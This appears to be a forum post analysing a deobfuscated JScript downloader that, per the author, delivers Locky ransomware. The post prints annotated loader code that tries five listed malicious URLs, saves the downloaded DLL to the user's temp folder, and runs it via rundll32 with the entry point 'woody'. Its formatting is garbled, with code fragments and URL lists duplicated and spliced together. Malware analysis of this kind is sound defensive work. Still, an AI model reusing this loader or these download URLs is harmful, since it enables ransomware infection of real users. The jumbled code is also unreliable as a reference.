- formatting is very chaotic.
2-3) Replacement of variable names :
tab_URLs = [
file = "r3wZioifc";
var para_save_file = 2;
var shell = WScript["CreateObject"]("WScript.Shell");
if (tab_of_system_strings ("PROCESSOR_ARCHITECTURE").toLowerCase() == "amd64")
{
var tab_Method_HTTP = [
{
try
{
var obj_http = WScript["CreateObject"](tab_Method_HTTP[index]);
{
continue;
};
var obj_FSO = new ActiveXObject("Scripting.FileSystemObject");
for (var index = 0; index < tab_URLs.length; index = index + 1)
{
try
{
obj_http["open"]("GET", tab_URLs[index], false);
obj_http["send"]();
while (obj_http.readystate < 4)
WScript["Sleep"](100);
var obj_stream = WScript["CreateObject"]("ADODB.Stream");
obj_stream["type"] = type;
obj_stream["write"](obj_http["ResponseBody"]);
obj_stream["position"] = 0;
obj_stream["SaveToFile"](path_file_dll, para_save_file);
obj_stream["close"]();
var obj_File = obj_FSO.GetFile(path_file_dll);
WScript.Quit(0);
} catch (e) {
continue;
};
}
WScript.Quit(0);
3) Conclusion :"http: //henanbusiness.net/xzwl8m2b",
"http: //himichesko-varna.com/fzqrolxe",
"http: //fototour.pl/hv9wgx80",
"http: //choopchirk.net/349u8",
"http: //rokematin.com/3ekauq6y"
];"http: //himichesko-varna.com/fzqrolxe",
"http: //fototour.pl/hv9wgx80",
"http: //choopchirk.net/349u8",
"http: //rokematin.com/3ekauq6y"
file = "r3wZioifc";
=> Name
var type = 1;
var para_save_file = 2;
var shell = WScript["CreateObject"]("WScript.Shell");
=> object Shell created
var path = shell.ExpandEnvironmentStrings("%TEMP%/");
=> %TEPMP%/ => C:\Users\DardiM\AppData\Local\Temp
var path_file = path + file;
=> C:\Users\DardiM\AppData\Local\Temp\r3wZioifc
var path_file_dll = path_file + ".d" + "ll";
=> C:\Users\DardiM\AppData\Local\Temp\r3wZioifc.dll
var tab_of_system_strings = shell.Environment("System");
if (tab_of_system_strings ("PROCESSOR_ARCHITECTURE").toLowerCase() == "amd64")
{
=> Which processor archichecture is used ?
var path_rundll32 = shell.ExpandEnvironmentStrings("%SystemRoot%\\SysWOW64\\rundll32.exe");
} else {
=> 64 bit : C:\Windows\SysWOW64\rundll32.exe
var path_rundll32 = shell.ExpandEnvironmentStrings("%SystemRoot%\\system32\\rundll32.exe");
}
=> 32 bit C:\Windows\System32\rundll32.exevar tab_Method_HTTP = [
"MSXML2.XMLHTTP",
"WinHttp.WinHttpRequest.5.1"
];"WinHttp.WinHttpRequest.5.1"
=> methods that can be used for connections
for (var index = 0; index < tab_Method_HTTP["length"]; index++)
{
try
{
var obj_http = WScript["CreateObject"](tab_Method_HTTP[index]);
=> creates an Http objct from the tab that contains two methods
break;
=> if One method works : quit the for LOOP
} catch (e)=> if One method works : quit the for LOOP
{
continue;
=> continue until one method works
}
};
var obj_FSO = new ActiveXObject("Scripting.FileSystemObject");
for (var index = 0; index < tab_URLs.length; index = index + 1)
{
try
{
obj_http["open"]("GET", tab_URLs[index], false);
obj_http["send"]();
while (obj_http.readystate < 4)
WScript["Sleep"](100);
var obj_stream = WScript["CreateObject"]("ADODB.Stream");
=> object stream created to retrive the response of the request
obj_stream["open"]();
obj_stream["type"] = type;
obj_stream["write"](obj_http["ResponseBody"]);
=> response data written on the stream
obj_stream["SaveToFile"](path_file_dll, para_save_file);
=> File saved ; overwrite if already exists, para_save_file : 2
var obj_File = obj_FSO.GetFile(path_file_dll);
=> C:\Users\DardiM\AppData\Local\Temp\r3wZioifc.dll
var small_file_path = obj_File.ShortPath;
=> get the short file name : C:\Users\DardiM\AppData\Local\Temp\R3WZIO~1.DLL
shell["Run"](path_rundll32 + " " + small_file_path + ",woody");
WScript.Quit(0);
} catch (e) {
continue;
};
}
WScript.Quit(0);
A very easy to understand script, with only very long var names why random letters.
From :
http ://henanbusiness.net/xzwl8m2b,
http ://himichesko-varna.com/fzqrolxe,
http ://fototour.pl/hv9wgx80,
http ://choopchirk.net/349u8,
http ://rokematin.com/3ekauq6y
http ://himichesko-varna.com/fzqrolxe,
http ://fototour.pl/hv9wgx80,
http ://choopchirk.net/349u8,
http ://rokematin.com/3ekauq6y
The first URL that works allows to download a file :
- r3wZioifc.dll
on the folder :
- C:\Users\DardiM\AppData\Local\Temp\
Run part :
Using the rundll32 determinate for our OS version :
=> small_file_path : "C:\Users\fredd\AppData\Local\Temp\\R3WZIO~1.DLL"
=> entry point of the dll : woody => necessary to make the work
Payload : Locky .thor=> C:\Windows\SysWOW64\rundll32.exe
=> C:\Windows\System32\rundll32.exe
shell["Run"](path_rundll32 + " " + small_file_path + ",woody");=> C:\Windows\System32\rundll32.exe
=> small_file_path : "C:\Users\fredd\AppData\Local\Temp\\R3WZIO~1.DLL"
=> entry point of the dll : woody => necessary to make the work
Very easy method used....
A very good example to begin to learn malware scripts to your children ...
Last edited:
